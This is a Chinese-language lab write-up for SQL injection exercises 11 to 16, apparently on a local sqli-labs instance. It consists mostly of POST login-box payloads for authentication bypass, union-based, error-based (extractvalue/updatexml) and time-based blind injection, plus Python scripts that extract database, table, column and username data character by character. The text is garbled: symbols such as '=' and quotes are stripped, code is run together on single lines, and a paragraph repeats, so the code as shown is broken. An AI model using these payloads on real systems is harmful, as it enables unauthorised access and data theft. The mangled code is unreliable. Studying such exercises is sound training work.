11.
看到登录框直接or 11。在HackBar中我们可以看到这里是POST传递的数据；在GET中用--来注释后面的内容，但GET中#是用来指导浏览器动作的，而--作为注释符后面需要跟一个空格，所以这里用#。
之后就和GET的一样了：1 order by 2 # 正常，order by 3 报错。
联合注入 …11.
看到登录框直接or 11。在HackBar中我们可以看到这里是POST传递的数据；在GET中用--来注释后面的内容，但GET中#是用来指导浏览器动作的，而--作为注释符后面需要跟一个空格，所以这里用#。
之后就和GET的一样了：1 order by 2 # 正常，order by 3 报错。
联合注入 1 union select 1,2 # 1‘ union select database(),2# 1 union select 1,group_concat(table_name) from information_schema.tables where table_schemasecurity # 1 union select 1,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers# 1 union select 1,group_concat(username) from security.users #
12. 输入1没反应，尝试”；通过“尝试得到报错，知道还要 1) or 11 #
之后一样’ 1) union select 1,2 # 1) union select 1,database() # 1) union select 1,group_concat(table_name) from information_schema.tables where table_schemasecurity # 1) union select 1,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers# 1) union select 1,group_concat(username) from security.users #
13. 用1‘尝试出现报错，知道是1’。页面显示登录成功但不会出现提示，但是有报错信息，所以使用报错注入；这里我们使用两种报错注入方法：
1) and extractvalue(1,concat(0x5c,database()))#
1) and updatexml(1,concat(0x7e,database(),0x7e),1) # 注入得到表名 1) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x7e),1)#1) and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schemasecurity))) # 注入的列名
1) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1)
1) and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)))# 注入的数据
1) and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
1) and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))# 14.
对输入框测试，发现当输入1“ or 11 #时登录成功，于是使用报错注入：
1 and updatexml(1,concat(0x7e,database(),0x7e),1)#
1 and extractvalue(1,concat(0x5c,database()))# 得到数据库库名
1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schemasecurity)))# 得到表名
1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers)))# 得到列名
1 and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1 and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))# 15.
当1’ or 11#时返回登录成功。这里看到如果输入的为错则返回登录失败，不会出现报错信息，所以使用布尔盲注。
这里我们要知道and和or的区别：and两边的条件都为真才会执行，or一边为真就会执行。而这里我们如果没有爆破过用户、admin也不在username中，那我们就只能使用or。这里的登录框根据经验第一个肯定是获取username的。
admin and (substr(database(),1,1)s)#
1 or (substr(database(),1,1)s)# 1 or (substr(database(),1,1)a)# 这里成功和失败只会返回不同的图片，对于脚本来说没有很明显的特征，所以我们使用sleep来写脚本。 import requests,time
def database():data_base charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr(database(),{len(data_base) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_time#print(f耗时:{rsp_time})if rsp_time 2:data_base charprint(f数据库名为:{data_base})breakelse:breakreturn data_basedatas database()
print(f最终数据库名为:{datas})
1 or if(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity limit 0,1),1,1)e,sleep(5),0)# def tablename():table_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_timeif rsp_time 2:table_name charprint(f表名为:{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为:{tables}) 1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),1,1)i,sleep(5),0)# def columnname():column_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f列名为:{column_name})breakelse:breakreturn column_namecolumns columnname()
print(f最终列名为:{columns})
1 or if(substr((select username from security.users limit 0,1),1,1)d,sleep(5),0)# def data():data charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为:{data})breakelse:breakreturn datadatadata data()
print(f最终数据为:{datadata})
import requests,time
def database():data_base charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr(database(),{len(data_base) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_time#print(f耗时:{rsp_time})if rsp_time 2:data_base charprint(f数据库名为:{data_base})breakelse:breakreturn data_basedatas database()
print(f最终数据库名为:{datas})def tablename():table_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_stime time.time()rsp_time end_stime - start_timeif rsp_time 2:table_name charprint(f表名为:{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为:{tables})def columnname():column_name charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f列名为:{column_name})breakelse:breakreturn column_name
columns columnname()
print(f最终列名为:{columns})def data():data charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789while True:for char in charset:payload {uname:f1 or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-15/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为:{data})breakelse:breakreturn datadatadata data()
print(f最终数据为:{datadata})
16.
测试发现1 or 11 #时登录成功 1) or if(substr(database(),1,1)s,sleep(5),0 )# import requests,timedef dataname():data_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr(database(),{len(data_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data_name charprint(f数据库为{data_name})breakelse:breakreturn data_namedatas dataname()
print(f最终数据名为{datas}) 1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),1,1)e,sleep(5),0)# def tablename():table_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:table_name charprint(f表名为{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为{tables}) 1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),1,1)i,sleep(5),0)# def columnname():column_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f字段名为{column_name})breakelse:breakreturn column_name columns columnname()
print(f最终字段名为{columns}) 1) or if(substr((select username from security.users limit 0,1),1,1)d,sleep(5),0)# def data():data chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为{data})breakelse:breakreturn datadatas data()
print(f最终数据为{datas}) 最终脚本
import requests,timedef dataname():data_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr(database(),{len(data_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data_name charprint(f数据库为{data_name})breakelse:breakreturn data_namedatas dataname()
print(f最终数据名为{datas})def tablename():table_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select table_name from information_schema.tables where table_schemasecurity limit 0,1),{len(table_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:table_name charprint(f表名为{table_name})breakelse:breakreturn table_nametables tablename()
print(f最终表名为{tables})def columnname():column_name chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1),{len(column_name) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:column_name charprint(f字段名为{column_name})breakelse:breakreturn column_name columns columnname()
print(f最终字段名为{columns})def data():data chart qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890while True:for char in chart:payload {uname:f1) or if(substr((select username from security.users limit 0,1),{len(data) 1},1){char},sleep(2),0)#,passwd:123456}url http://192.168.1.200:86/Less-16/start_time time.time()rsp requests.post(url,datapayload)end_time time.time()rsp_time end_time - start_timeif rsp_time 2:data charprint(f数据为{data})breakelse:breakreturn datadatas data()
print(f最终数据为{datas})